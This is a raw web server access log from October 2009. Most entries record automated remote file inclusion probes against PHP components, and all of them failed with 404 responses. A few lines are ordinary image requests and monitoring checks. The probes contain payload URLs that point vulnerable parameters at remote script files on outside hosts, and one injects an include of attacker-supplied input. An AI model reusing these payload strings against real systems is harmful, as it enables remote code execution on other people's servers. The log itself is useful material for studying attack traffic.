83.138.48.14 - - [06/Oct/2009:03:02:20 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:03:02:27 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:03:02:27 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:03:02:31 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:02:42 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:02:42 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:02:42 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:03:02:43 -0400] "GET /logs/access_log.Q109090900////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
69.162.74.91 - - [06/Oct/2009:03:02:44 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:44 -0400] "GET /logs/error_log.Q109051100%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:44 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:48 -0400] "GET /logs/error_log.Q109051100%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:48 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:48 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:02:54 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:02:54 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:03:08 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:03:09 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:03:09 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:03:03:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.55.227.178 - - [06/Oct/2009:03:03:14 -0400] "GET /logs/access_log.Q109090900////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
64.27.9.117 - - [06/Oct/2009:03:03:38 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:03:38 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:03:38 -0400] "GET /logs/error_log.Q109051100%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.168.176.42 - - [06/Oct/2009:03:04:13 -0400] "GET /logs/error_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:04:17 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:04:18 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:04:18 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:04:22 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:04:22 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:04:22 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:04:42 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:04:42 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:04:42 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:04:49 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:04:49 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:04:49 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:04:52 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:04:53 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:04:53 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:04:53 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:04:55 -0400] "GET /logs/access_log.Q109081400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:05:44 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:05:44 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:05:44 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:05:45 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:05:45 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:05:45 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:03:05:48 -0400] "GET /logs/access_log.Q109091600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:48 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:48 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:48 -0400] "GET /logs/access_log.Q109091600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:49 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:49 -0400] "GET /logs/access_log.Q109091600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:49 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:49 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:05:49 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
174.143.3.188 - - [06/Oct/2009:03:06:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [06/Oct/2009:03:06:11 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
174.143.3.188 - - [06/Oct/2009:03:06:11 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [06/Oct/2009:03:06:11 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
213.168.176.42 - - [06/Oct/2009:03:06:37 -0400] "GET /logs/access_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:07:32 -0400] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:07:32 -0400] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:07:32 -0400] "GET /logs/access_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:07:38 -0400] "GET /logs/access_log.Q109081100//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:03:08:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.4.113.98 - - [06/Oct/2009:03:08:25 -0400] "GET /logs/error_log.Q109072900/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:08:40 -0400] "GET /logs/error_log.Q109072900/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
64.27.9.117 - - [06/Oct/2009:03:08:47 -0400] "GET /logs/error_log.Q109051100//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:03:08:58 -0400] "GET /logs/error_log.Q109072900/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
222.73.17.7 - - [06/Oct/2009:03:09:05 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:05 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:05 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:05 -0400] "GET /logs/access_log.Q109091500/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:09 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:09 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:09 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:09:09 -0400] "GET /logs/access_log.Q109091500/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:09:49 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:09:54 -0400] "GET /logs/access_log.Q109081500//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:09:59 -0400] "GET /logs/access_log.Q109072200%20%20//write.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:09:59 -0400] "GET /logs//write.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:09:59 -0400] "GET /logs/access_log.Q109081400%20%20//write.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:09:59 -0400] "GET //write.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:11:39 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:11:39 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:11:39 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
71.140.20.123 - - [06/Oct/2009:03:11:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB5 (.NET CLR 3.5.30729)"
71.140.20.123 - - [06/Oct/2009:03:11:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB5 (.NET CLR 3.5.30729)"
71.140.20.123 - - [06/Oct/2009:03:11:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB5 (.NET CLR 3.5.30729)"
71.140.20.123 - - [06/Oct/2009:03:11:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB5 (.NET CLR 3.5.30729)"
74.55.90.178 - - [06/Oct/2009:03:12:05 -0400] "GET /index.php?op=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.55.90.178 - - [06/Oct/2009:03:12:06 -0400] "GET /logs/index.php?op=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.40.68.132 - - [06/Oct/2009:03:12:12 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:03:12:12 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.40.68.132 - - [06/Oct/2009:03:12:12 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:12:47 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:12:47 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:12:47 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:12:49 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:12:49 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:12:59 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:03:12:59 -0400] "GET /logs/access_log.Q109091500%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:03:13:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.115.80.58 - - [06/Oct/2009:03:14:01 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4 GTB5"
